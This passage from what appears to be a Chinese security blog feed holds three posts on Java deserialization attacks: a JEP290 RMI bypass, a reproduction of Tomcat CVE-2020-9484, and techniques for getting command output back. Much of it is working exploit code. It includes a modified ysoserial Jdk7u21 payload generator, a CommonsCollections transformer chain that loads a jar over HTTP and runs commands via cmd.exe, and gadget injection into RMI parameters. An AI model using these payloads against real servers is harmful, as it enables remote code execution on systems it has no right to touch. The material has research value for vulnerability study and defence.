    public String hello(Object object) throws RemoteException {
        System.out.println(object);
        return "hello "+object.toString();
    }
}
</code></pre>
<p>Hello.java</p>
<pre><code class="language-java line-numbers">package org.chabug.rmi.server;


import java.rmi.Remote;
import java.rmi.RemoteException;

public interface Hello extends Remote {
    String hello() throws RemoteException;
    String hello(String name) throws RemoteException;
    String hello(Object object) throws RemoteException;
}
</code></pre>
<p>使用JDK7u21打Commonscollections1，成功弹出calc。<br />
<img src="https://y4er.com/img/uploads/20200529110235.png" alt="image.png" /></p>
<p>使用JDK8u221启动RMIServer攻击失败<br />
<img src="https://y4er.com/img/uploads/20200529113177.png" alt="image.png" /><br />
报错显示</p>
<pre><code class="line-numbers">ObjectInputFilter REJECTED: class sun.reflect.annotation.AnnotationInvocationHandler, array length: -1, nRefs: 8, depth: 2, bytes: 298, ex: n/a
</code></pre>
<h2>JEP290的过滤机制</h2>
<p>在上文的报错中可见<code>sun.reflect.annotation.AnnotationInvocationHandler</code>被拒绝，跟一下RMI的过程，看下在哪里过滤了，JEP290又是怎么实现的。以下使用JDK8U221调试</p>
<p>首先我们要清楚RMI的实现流程<br />
<img src="https://y4er.com/img/uploads/20200529118617.png" alt="image.png" /><br />
在远程引用层中客户端服务端两个交互的类分别是<code>RegistryImpl_Stub</code>和<code>RegistryImpl_Skel</code>，在服务端的<code>RegistryImpl_Skel</code>类中，向注册中心进行bind、rebind操作时均进行了readObject操作以此拿到Remote远程对象引用。<br />
<img src="https://y4er.com/img/uploads/20200529113113.png" alt="image.png" /></p>
<p>跟进63行进入到<code>java.io.ObjectInputStream#readObject</code>，然后进入<code>readObject0()</code><br />
<img src="https://y4er.com/img/uploads/20200529117657.png" alt="image.png" /><br />
在readObject0()之中进入readOrdinaryObject()<br />
<img src="https://y4er.com/img/uploads/20200529111407.png" alt="image.png" /><br />
继续进入readClassDesc()<br />
<img src="https://y4er.com/img/uploads/20200529116825.png" alt="image.png" /><br />
进入readProxyDesc()<br />
<img src="https://y4er.com/img/uploads/20200529118768.png" alt="image.png" /></p>
<p>在readProxyDesc()中有filterCheck<br />
<img src="https://y4er.com/img/uploads/20200529117829.png" alt="image.png" /></p>
<p>先检查其所有接口，然后检查对象自身。进入filterCheck()之后<br />
<img src="https://y4er.com/img/uploads/20200529113824.png" alt="image.png" /><br />
调用了serialFilter.checkInput()，最终来到<code>sun.rmi.registry.RegistryImpl#registryFilter</code><br />
<img src="https://y4er.com/img/uploads/20200529116979.png" alt="image.png" /></p>
<pre><code class="language-java line-numbers">return String.class != var2 &amp;&amp; !Number.class.isAssignableFrom(var2) &amp;&amp; !Remote.class.isAssignableFrom(var2) &amp;&amp; !Proxy.class.isAssignableFrom(var2) &amp;&amp; !UnicastRef.class.isAssignableFrom(var2) &amp;&amp; !RMIClientSocketFactory.class.isAssignableFrom(var2) &amp;&amp; !RMIServerSocketFactory.class.isAssignableFrom(var2) &amp;&amp; !ActivationID.class.isAssignableFrom(var2) &amp;&amp; !UID.class.isAssignableFrom(var2) ? Status.REJECTED : Status.ALLOWED;
</code></pre>
<p><img src="https://y4er.com/img/uploads/20200529116890.png" alt="image.png" /><br />
没有给<code>AnnotationInvocationHandler</code>白名单，所以返回REJECTED。</p>
<h2>绕过JEP290</h2>
<p>在RMI远程方法调用过程中，方法参数需要先序列化，从本地JVM发送到远程JVM，然后在远程JVM上反序列化，执行完后，将结果序列化，发送回本地JVM，而在本地的参数是我们可以控制的，如果向参数中注入gadget会怎么样？</p>
<p>我在HelloImpl实现了三个hello()方法，分别是void、string、Object类型的参数<br />
<img src="https://y4er.com/img/uploads/20200529119249.png" alt="image.png" /></p>
<p>在客户端我向Object参数类型注入cc5的gadget<br />
<img src="https://y4er.com/img/uploads/20200529118670.png" alt="image.png" /></p>
<p>运行成功弹出calc<br />
<img src="https://y4er.com/img/uploads/20200529110642.png" alt="image.png" /></p>
<p>也就是说：如果目标的RMI服务暴漏了Object参数类型的方法，我们就可以注入payload进去。</p>
<p>那么别的参数类型呢？在sun.rmi.server.UnicastRef#unmarshalValue中判断了远程调用方法的参数类型<br />
<img src="https://y4er.com/img/uploads/20200529113622.png" alt="image.png" /><br />
如果不是基本类型，就进入readObject，之后的流程也走了filterCheck过滤<br />
<img src="https://y4er.com/img/uploads/20200529110830.png" alt="image.png" /><br />
不过在<code>sun.rmi.transport.DGCImpl#checkInput</code>这里ObjID是在白名单中的，所以可以被反序列化。</p>
<p>那这个只是object类型的参数可以，其他的参数类型呢？</p>
<p>由于攻击者可以完全控制客户端，因此他可以用恶意对象替换从Object类派生的参数（例如String）有几种方法：</p>
<ol>
<li>将java.rmi软件包的代码复制到新软件包，然后在其中更改代码</li>
<li>将调试器附加到正在运行的客户端，并在序列化对象之前替换对象</li>
<li>使用Javassist之类的工具更改字节码</li>
<li>通过实现代理来替换网络流上已经序列化的对象</li>
</ol>
<p>afanti师傅用的是通过RASP hook住<code>java.rmi.server.RemoteObjectInvocationHandler</code>类的<code>InvokeRemoteMethod</code>方法的第三个参数非Object的改为Object的gadget。他的项目地址在<a class="wp-editor-md-post-content-link" href="https://github.com/Afant1/RemoteObjectInvocationHandler">RemoteObjectInvocationHandler</a>。</p>
<p>修改<code>src\main\java\afanti\rasp\visitor\RemoteObjectInvocationHandlerHookVisitor.java</code>的dnslog地址，然后打包出来在RMIClient运行前加上<code>-javaagent:e:/rasp-1.0-SNAPSHOT.jar</code></p>
<p>虽然报错参数类型不匹配<br />
<img src="https://y4er.com/img/uploads/20200529110171.png" alt="image.png" /></p>
<p>但是dnslog已经收到请求了。</p>
<p><img src="https://y4er.com/img/uploads/20200529117757.png" alt="image.png" /></p>
<h2>参考</h2>
<ol>
<li>https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/</li>
<li>https://www.anquanke.com/post/id/200860</li>
<li>https://github.com/Afant1/RemoteObjectInvocationHandler</li>
<li>https://paper.seebug.org/454/</li>
</ol>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>CVE-2020-9484 Tomcat Session Rce 复现分析</title>
		<link>/audit/1788.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Wed, 27 May 2020 02:23:07 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[rce]]></category>
		<category><![CDATA[tomcat]]></category>
		<category><![CDATA[审计]]></category>
		<guid isPermaLink="false">/?p=1788</guid>

					<description><![CDATA[环境 Tomcat 7.0.99 JDK7u21 影响版本 &#60;= 9.0.34 &#60;= 8.5.54 &#60;= 7.0.103 配置tomcat调试环境 修改catal...]]></description>
										<content:encoded><![CDATA[<h2>环境</h2>
<ol>
<li>Tomcat 7.0.99</li>
<li>JDK7u21</li>
</ol>
<h2>影响版本</h2>
<ol>
<li>&lt;= 9.0.34</li>
<li>&lt;= 8.5.54</li>
<li>&lt;= 7.0.103</li>
</ol>
<h2>配置<span class="wpcom_tag_link"><a href="/tags/tomcat" title="tomcat" target="_blank">tomcat</a></span>调试环境</h2>
<p>修改catalina.bat添加一行</p>
<pre><code class="line-numbers">set JAVA_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8001
</code></pre>
<p>idea配置remote tomcat调试 端口为8001</p>
<h2>复现</h2>
<p>修改tomcat路径conf目录下的context.xml 在<code>&lt;Context&gt;</code>标签内加入以下配置</p>
<pre data-language=XML><code class="language-markup line-numbers">  &lt;Manager className="org.apache.catalina.session.PersistentManager" 
      debug="0"
      saveOnRestart="false"
      maxActiveSession="-1"
      minIdleSwap="-1"
      maxIdleSwap="-1"
      maxIdleBackup="-1"&gt;
      &lt;Store className="org.apache.catalina.session.FileStore" directory="../sessions" /&gt;
  &lt;/Manager&gt;
</code></pre>
<p>为了方便burp抓包，修改server.xml端口为80</p>
<p>下载ysoserial使用idea导入之后修改jdk7u21的链</p>
<pre><code class="language-java line-numbers">package ysoserial.payloads;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

import javax.xml.transform.Templates;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.LinkedHashSet;

@SuppressWarnings({"rawtypes", "unchecked"})
@PayloadTest(precondition = "isApplicableJavaVersion")
@Dependencies()
@Authors({Authors.FROHOFF})
public class Jdk7u21 implements ObjectPayload&lt;Object&gt; {

    public static boolean serialize(Object obj, String file) {
        try {
            ObjectOutputStream os = new ObjectOutputStream(new FileOutputStream(file));
            os.writeObject(obj);
            os.close();
            return true;
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            return false;
        }
    }

    public static boolean isApplicableJavaVersion() {
        JavaVersion v = JavaVersion.getLocalVersion();
        return v != null &amp;&amp; (v.major &lt; 7 || (v.major == 7 &amp;&amp; v.update &lt;= 21));
    }

    public static void main(final String[] args) throws Exception {
        PayloadRunner.run(Jdk7u21.class, args);
    }

    public Object getObject(final String command) throws Exception {
        final Object templates = Gadgets.createTemplatesImpl(command);

        String zeroHashCodeStr = "f5a5a608";

        HashMap map = new HashMap();
        map.put(zeroHashCodeStr, "foo");

        InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
        Reflections.setFieldValue(tempHandler, "type", Templates.class);
        Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);

        LinkedHashSet set = new LinkedHashSet(); // maintain order
        set.add(templates);
        set.add(proxy);

        Reflections.setFieldValue(templates, "_auxClasses", null);
        Reflections.setFieldValue(templates, "_class", null);

        map.put(zeroHashCodeStr, templates); // swap in real object
        serialize(set, "e:/evil.session");
        return set;
    }

}
</code></pre>
<p>配置idea参数为<br />
<img src="https://y4er.com/img/uploads/20200525100696.png" alt="image.png" /><br />
然后运行生成<code>e:/evil.session</code>文件，将其保存到<code>D:\tomcat\apache-tomcat-7.0.99\work\Catalina\localhost\cve-2020-9484_war\sessions</code>目录中，burp抓包设置session为evil，触发反序列化达成RCE。</p>
<p><img src="https://y4er.com/img/uploads/20200525105570.png" alt="image.png" /><br />
<img src="https://y4er.com/img/uploads/20200525100287.png" alt="image.png" /></p>
<h2>分析</h2>
<p>在php中会将用户session以文件的形式存储到服务器中，<span class="wpcom_tag_link"><a href="/tags/java" title="java" target="_blank">java</a></span>自然也可以，对于大型的企业应用，为了避障会将数据库或者session以文件的形式保存到文件中，那么以文件的形式保存对象自然就涉及到了序列化和反序列化。</p>
<p>通过复现漏洞可知该反序列化入口点在于<code>Context.xml</code>中配置的<code>org.apache.catalina.session.FileStore</code>，查看其代码在load()中发现readObjcet</p>
<pre><code class="language-java line-numbers">    public Session load(String id) throws ClassNotFoundException, IOException {
        File file = this.file(id);
        if (file != null &amp;&amp; file.exists()) {
            Context context = (Context)this.getManager().getContainer();
            Log containerLog = context.getLogger();
            if (containerLog.isDebugEnabled()) {
                containerLog.debug(sm.getString(this.getStoreName() + ".loading", new Object[]{id, file.getAbsolutePath()}));
            }

            FileInputStream fis = null;
            ObjectInputStream ois = null;
            Loader loader = null;
            ClassLoader classLoader = null;
            ClassLoader oldThreadContextCL = Thread.currentThread().getContextClassLoader();

            StandardSession var11;
            try {
                fis = new FileInputStream(file.getAbsolutePath());
                loader = context.getLoader();
                if (loader != null) {
                    classLoader = loader.getClassLoader();
                }

                if (classLoader != null) {
                    Thread.currentThread().setContextClassLoader(classLoader);
                }

                ois = this.getObjectInputStream(fis);
                StandardSession session = (StandardSession)this.manager.createEmptySession();
                session.readObjectData(ois);
                session.setManager(this.manager);
                var11 = session;
                return var11;
            } catch (FileNotFoundException var25) {
                ...
        }
    }
</code></pre>
<p>代码很明显，通过id打开session文件，然后获取context的类加载器赋值给当前线程的类加载器，以此拿到当前容器Container中的lib，<code>session.readObjectData(ois)</code>中触发了反序列化RCE。</p>
<h2>修复</h2>
<p>在 <a class="wp-editor-md-post-content-link" href="https://github.com/apache/tomcat/commit/3aa8f28db7efb311cdd1b6fe15a9cd3b167a2222#diff-d7c9b18d315c5a1fb1e71831656064ad">java/org/apache/catalina/session/FileStore.java</a> 中判断了目录是否有效<br />
<img src="https://y4er.com/img/uploads/20200525101938.png" alt="image.png" /></p>
<h2>gadget用哪个?</h2>
<p>因为通过当前Container的类加载器反序列化对象，所以能拿到当前war包中的lib，所以有什么用什么，什么都没有就用jdk的gatget。</p>
<h2>遇到的问题</h2>
<p>直接使用ysoserial生成的payload不行，在<code>java/io/ObjectInputStream.java:299</code>中会验证前几位字节码，抛出异常，堆栈如下</p>
<pre><code class="language-java line-numbers">readStreamHeader:799, ObjectInputStream (java.io)
&lt;init&gt;:299, ObjectInputStream (java.io)
&lt;init&gt;:95, CustomObjectInputStream (org.apache.catalina.util)
getObjectInputStream:237, StoreBase (org.apache.catalina.session)
load:248, FileStore (org.apache.catalina.session)
loadSessionFromStore:789, PersistentManagerBase (org.apache.catalina.session)
swapIn:739, PersistentManagerBase (org.apache.catalina.session)
findSession:517, PersistentManagerBase (org.apache.catalina.session)
doGetSession:3147, Request (org.apache.catalina.connector)
getSession:2489, Request (org.apache.catalina.connector)
getSession:897, RequestFacade (org.apache.catalina.connector)
getSession:909, RequestFacade (org.apache.catalina.connector)
_initialize:147, PageContextImpl (org.apache.jasper.runtime)
initialize:126, PageContextImpl (org.apache.jasper.runtime)
internalGetPageContext:111, JspFactoryImpl (org.apache.jasper.runtime)
getPageContext:64, JspFactoryImpl (org.apache.jasper.runtime)
_jspService:6, index_jsp (org.apache.jsp)
service:70, HttpJspBase (org.apache.jasper.runtime)
service:728, HttpServlet (javax.servlet.http)
service:477, JspServletWrapper (org.apache.jasper.servlet)
serviceJspFile:395, JspServlet (org.apache.jasper.servlet)
service:339, JspServlet (org.apache.jasper.servlet)
service:728, HttpServlet (javax.servlet.http)
internalDoFilter:303, ApplicationFilterChain (org.apache.catalina.core)
doFilter:208, ApplicationFilterChain (org.apache.catalina.core)
doFilter:52, WsFilter (org.apache.tomcat.websocket.server)
internalDoFilter:241, ApplicationFilterChain (org.apache.catalina.core)
doFilter:208, ApplicationFilterChain (org.apache.catalina.core)
invoke:219, StandardWrapperValve (org.apache.catalina.core)
invoke:110, StandardContextValve (org.apache.catalina.core)
invoke:492, AuthenticatorBase (org.apache.catalina.authenticator)
invoke:165, StandardHostValve (org.apache.catalina.core)
invoke:104, ErrorReportValve (org.apache.catalina.valves)
invoke:1025, AccessLogValve (org.apache.catalina.valves)
invoke:116, StandardEngineValve (org.apache.catalina.core)
service:452, CoyoteAdapter (org.apache.catalina.connector)
process:1195, AbstractHttp11Processor (org.apache.coyote.http11)
process:654, AbstractProtocol$AbstractConnectionHandler (org.apache.coyote)
doRun:2532, AprEndpoint$SocketProcessor (org.apache.tomcat.util.net)
run:2521, AprEndpoint$SocketProcessor (org.apache.tomcat.util.net)
runWorker:1145, ThreadPoolExecutor (java.util.concurrent)
run:615, ThreadPoolExecutor$Worker (java.util.concurrent)
run:61, TaskThread$WrappingRunnable (org.apache.tomcat.util.threads)
run:722, Thread (java.lang)
</code></pre>
<p>具体原因可能是因为yso对于反序列化对象写入文件的操作不一样，自己写一个serialize()就行了</p>
<h2>攻击面和约束条件的思考</h2>
<p>先谈约束条件吧，利用难度还是比较大的。<br />
1. 不是默认配置，需要手动增加<code>Context.xml</code><br />
2. 文件上传 文件后缀需要是<code>.session</code><br />
3. 需要知道绝对路径来跨目录</p>
<p>拓展下攻击面，比如redis，这里<code>@l1nk3r</code>师傅公开了<a class="wp-editor-md-post-content-link" href="http://www.lmxspace.com/2020/05/21/Tomcat-Remote-Code-Execution-via-session-persistence-%E5%88%86%E6%9E%90%E3%80%90CVE-2020-9484%E3%80%91/#0x05%E5%90%8E%E8%AF%9D">另一种使用redis的反序列化场景</a>，问题出现在<code>RedisSession</code>类中，原理和9484差不多，id从jsessionid获取，value是反序列化数据，配合redis任意写入value来触发反序列化。</p>
<h2>参考</h2>
<ol>
<li><a class="wp-editor-md-post-content-link" href="http://www.lmxspace.com/2020/05/21/Tomcat-Remote-Code-Execution-via-session-persistence-%E5%88%86%E6%9E%90%E3%80%90CVE-2020-9484%E3%80%91/#0x05%E5%90%8E%E8%AF%9D">另一种使用redis的反序列化场景</a></li>
<li>https://github.com/apache/tomcat/commit/3aa8f28db7efb311cdd1b6fe15a9cd3b167a2222#diff-d7c9b18d315c5a1fb1e71831656064ad</li>
<li>https://www.sec-in.com/article/394</li>
<li>https://www.cnblogs.com/potatsoSec/p/12931427.html</li>
</ol>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Java 反序列化回显的多种姿势</title>
		<link>/audit/1777.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Fri, 15 May 2020 16:16:24 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[weblogic]]></category>
		<category><![CDATA[反序列化]]></category>
		<guid isPermaLink="false">/?p=1777</guid>

					<description><![CDATA[聊一聊反序列化回显的问题 写在文前 在研究weblogic、fastjson、shiro反序列化漏洞时，多次遇到了回显问题，本文将从以下几种角度出发来分别探讨反序列化回显的问题，也...]]></description>
										<content:encoded><![CDATA[<p>聊一聊<span class="wpcom_tag_link"><a href="/tags/%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96" title="反序列化" target="_blank">反序列化</a></span>回显的问题</p>
<h2>写在文前</h2>
<p>在研究<span class="wpcom_tag_link"><a href="/tags/weblogic" title="weblogic" target="_blank">weblogic</a></span>、fastjson、shiro反序列化漏洞时，多次遇到了回显问题，本文将从以下几种角度出发来分别探讨反序列化回显的问题，也感谢各位师傅们的反序列化回显研究。</p>
<ol>
<li>defineClass</li>
<li>RMI绑定实例</li>
<li>URLClassLoader抛出异常</li>
<li>中间件</li>
<li>写文件css、js</li>
<li>dnslog</li>
</ol>
<h2>defineClass</h2>
<p>先说defineClass这个东西是因为下面的几种方式都是在其基础上进行改进。defineClass归属于ClassLoader类，其主要作用就是使用编译好的字节码就可以定义一个类。</p>
<p>形如</p>
<pre><code class="language-java line-numbers">package com.test.ClassLoader;

import java.lang.reflect.Method;

public class MyClassLoader extends ClassLoader {
    private static String myClassName = "com.test.ClassLoader.HelloWorld";
    private static byte[] bs = new byte[]{
        -54, -2, -70, -66, 0, 0, 0, 52, 0, 36, 10, 0, 7, 0, 22, 9, 0, 23, 0, 24, 8, 0, 25, 10, 0, 26, 0, 27, 8, 0, 19, 7, 0, 28, 7, 0, 29, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 33, 76, 99, 111, 109, 47, 116, 101, 115, 116, 47, 67, 108, 97, 115, 115, 76, 111, 97, 100, 101, 114, 47, 72, 101, 108, 108, 111, 87, 111, 114, 108, 100, 59, 1, 0, 4, 109, 97, 105, 110, 1, 0, 22, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 4, 97, 114, 103, 115, 1, 0, 19, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 4, 116, 101, 115, 116, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 15, 72, 101, 108, 108, 111, 87, 111, 114, 108, 100, 46, 106, 97, 118, 97, 12, 0, 8, 0, 9, 7, 0, 30, 12, 0, 31, 0, 32, 1, 0, 5, 72, 101, 108, 108, 111, 7, 0, 33, 12, 0, 34, 0, 35, 1, 0, 31, 99, 111, 109, 47, 116, 101, 115, 116, 47, 67, 108, 97, 115, 115, 76, 111, 97, 100, 101, 114, 47, 72, 101, 108, 108, 111, 87, 111, 114, 108, 100, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 121, 115, 116, 101, 109, 1, 0, 3, 111, 117, 116, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 80, 114, 105, 110, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 80, 114, 105, 110, 116, 83, 116, 114, 101, 97, 109, 1, 0, 7, 112, 114, 105, 110, 116, 108, 110, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 0, 33, 0, 6, 0, 7, 0, 0, 0, 0, 0, 3, 0, 1, 0, 8, 0, 9, 0, 1, 0, 10, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 11, 0, 0, 0, 6, 0, 1, 0, 0, 0, 3, 0, 12, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 13, 0, 14, 0, 0, 0, 9, 0, 15, 0, 16, 0, 1, 0, 10, 0, 0, 0, 55, 0, 2, 0, 1, 0, 0, 0, 9, -78, 0, 2, 18, 3, -74, 0, 4, -79, 0, 0, 0, 2, 0, 11, 0, 0, 0, 10, 0, 2, 0, 0, 0, 5, 0, 8, 0, 6, 0, 12, 0, 0, 0, 12, 0, 1, 0, 0, 0, 9, 0, 17, 0, 18, 0, 0, 0, 9, 0, 19, 0, 9, 0, 1, 0, 10, 0, 0, 0, 37, 0, 2, 0, 0, 0, 0, 0, 9, -78, 0, 2, 18, 5, -74, 0, 4, -79, 0, 0, 0, 1, 0, 11, 0, 0, 0, 10, 0, 2, 0, 0, 0, 8, 0, 8, 0, 9, 0, 1, 0, 20, 0, 0, 0, 2, 0, 21,
    };

    public static void main(String[] args) {
        try {
            MyClassLoader loader = new MyClassLoader();
            Class helloClass = loader.loadClass(myClassName);
            Object obj = helloClass.newInstance();
            Method method = obj.getClass().getMethod("test");
            method.invoke(null);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    @Override
    protected Class&lt;?&gt; findClass(String name) throws ClassNotFoundException {
        if (name == myClassName) {
            System.out.println("加载" + name + "类");
            return defineClass(myClassName, bs, 0, bs.length);
        }
        return super.findClass(name);
    }

}
</code></pre>
<h2>RMI绑定实例</h2>
<p>之前写过一篇 <a class="wp-editor-md-post-content-link" href="https://xz.aliyun.com/t/7228">《Weblogic使用ClassLoader和RMI来回显命令执行结果》</a>，其中提到了使用commons-collection反射调用defineClass，通过defineClass定义的恶意命令执行字节码来绑定RMI实例，接着通过RMI调用绑定的实例拿到回显结果。其中最关键的代码就下面几行</p>
<pre><code class="language-java line-numbers">// common-collection1 构造transformers 定义自己的RMI接口
Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(DefiningClassLoader.class),
        new InvokerTransformer("getDeclaredConstructor",
            new Class[] { Class[].class }, new Object[] { new Class[0] }),
        new InvokerTransformer("newInstance",
            new Class[] { Object[].class },
            new Object[] { new Object[0] }),
        new InvokerTransformer("defineClass",
            new Class[] { String.class, byte[].class },
            new Object[] { className, classBytes }),
        new InvokerTransformer("getMethod",
            new Class[] { String.class, Class[].class },
            new Object[] { "main", new Class[] { String[].class } }),
        new InvokerTransformer("invoke",
            new Class[] { Object.class, Object[].class },
            new Object[] { null, new Object[] { null } }),
        new ConstantTransformer(new HashSet())
};
</code></pre>
<p>使用cc链进行反射调用，其中className为恶意命令执行类，形如<code>com.test.payload.RemoteImpl</code>，继承自Remote接口的实现，classBytes为该类字节码数组，将该类对象绑定在<code>rmi://127.0.0.1:1099/Hello</code>实例上，进而通过JNDI调用Hello即可。</p>
<h2>URLClassLoader抛出异常</h2>
<p>通过将回显结果封装到异常信息抛出拿到回显。</p>
<p>首先写一下执行命令的类</p>
<pre><code class="language-java line-numbers">import java.io.*;
import java.nio.charset.Charset;

public class ProcessExec {
    public ProcessExec(String cmd) throws Exception {
        InputStream stream = (new ProcessBuilder(new String[]{"cmd.exe", "/c", cmd})).start().getInputStream();
        InputStreamReader streamReader = new InputStreamReader(stream, Charset.forName("gbk"));
        BufferedReader bufferedReader = new BufferedReader(streamReader);
        StringBuffer buffer = new StringBuffer();
        String line = null;

        while((line = bufferedReader.readLine()) != null) {
            buffer.append(line).append("\n");
        }

        throw new Exception(buffer.toString());
    }
}
</code></pre>
<p>打jar包</p>
<pre><code class="language-java line-numbers">javac ProcessExec.java
jar -cvf p.jar ProcessExec.class
</code></pre>
<p>使用URLClassLoader加载jar获得回显</p>
<pre><code class="language-java line-numbers">package payload;

import java.lang.reflect.Constructor;
import java.net.URL;
import java.net.URLClassLoader;

public class URLClassloader {
    public static void main(String[] args) throws Exception {
        URL url = new URL("http://127.0.0.1/p.jar");
        URL[] urls = {url};
        URLClassLoader urlClassLoader = URLClassLoader.newInstance(urls);
        Constructor&lt;?&gt; processExec = urlClassLoader.loadClass("ProcessExec").getConstructor(String.class);
        processExec.newInstance("ipconfig");

    }
}
</code></pre>
<p><img src="https://y4er.com/img/uploads/20200516008124.png" alt="image.png" /></p>
<p>使用URLClassLoader的部份可以通过cc链反射去做</p>
<pre><code class="language-java line-numbers">package payload;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.net.URLClassLoader;
import java.util.HashMap;
import java.util.Map;

class CommonsCollections5URLClassLoader {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(URLClassLoader.class),
                // 获取构造方法
                new InvokerTransformer("getConstructor",
                        new Class[]{Class[].class},
                        new Object[]{new Class[]{java.net.URL[].class}}),
                // new实例并赋值url
                new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[]{new URL[]{new URL("http://127.0.0.1/p.jar")}}}),
                // loadClass加载ProcessExec
                new InvokerTransformer("loadClass", new Class[]{String.class}, new Object[]{"ProcessExec"}),
                // 获取ProcessExec的构造方法
                new InvokerTransformer("getConstructor", new Class[]{Class[].class}, new Object[]{new Class[]{String.class}}),
                // 实例化ProcessExec
                new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new String[]{"ipconfig"}})

        };
        Transformer chain = new ChainedTransformer(transformers);
        Map map = new HashMap();
        Map lazyMap = LazyMap.decorate(map, chain);
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "");
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(entry);
        Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
        field.setAccessible(true);
        field.set(badAttributeValueExpException, entry);

        serialize(badAttributeValueExpException);
        deserialize();
    }

    public static void serialize(Object obj) {
        try {
            ObjectOutputStream os = new ObjectOutputStream(new FileOutputStream("test.ser"));
            os.writeObject(obj);
            os.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void deserialize() {
        try {
            ObjectInputStream is = new ObjectInputStream(new FileInputStream("test.ser"));
            is.readObject();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
</code></pre>
<p>这个例子大多出现在jboss和fastjson中，灵活使用。</p>
<h2>中间件回显</h2>
<p>中间件而言多数重写了thread类，在thread中保存了req和resp，可以通过获取当前线程，在resp中写入回显结果</p>
<p>这种方法前几天在先知上有很多针对tomcat无回显的文章，为各位师傅的文章画一下时间线：</p>
<ol>
<li><a class="wp-editor-md-post-content-link" href="https://www.anquanke.com/post/id/198886">《基于内存 Webshell 的无文件攻击技术研究》</a> 主要应用于Spring</li>
<li><a class="wp-editor-md-post-content-link" href="https://xz.aliyun.com/t/7307">《linux下java反序列化通杀回显方法的低配版实现》</a> 将回显结果写入文件操作符</li>
<li><a class="wp-editor-md-post-content-link" href="https://xz.aliyun.com/t/7348">《Tomcat中一种半通用回显方法》</a> 将执行命令的结果存入tomcat的response返回 shiro无法回显</li>
<li><a class="wp-editor-md-post-content-link" href="https://xz.aliyun.com/t/7388">《基于tomcat的内存 Webshell 无文件攻击技术》</a> 动态注册filter实现回显 shiro无法回显</li>
<li><a class="wp-editor-md-post-content-link" href="https://mp.weixin.qq.com/s?__biz=MzIwNDA2NDk5OQ==&amp;mid=2651374294&amp;idx=3&amp;sn=82d050ca7268bdb7bcf7ff7ff293d7b3">《基于全局储存的新思路 | Tomcat的一种通用回显方法研究》</a> 通过Thread.currentThread.getContextClassLoader() 拿到request、response回显 tomcat7中获取不到StandardContext</li>
<li><a class="wp-editor-md-post-content-link" href="https://xz.aliyun.com/t/7535">《tomcat不出网回显连续剧第六集》</a> 直接从Register拿到process对应的req</li>
</ol>
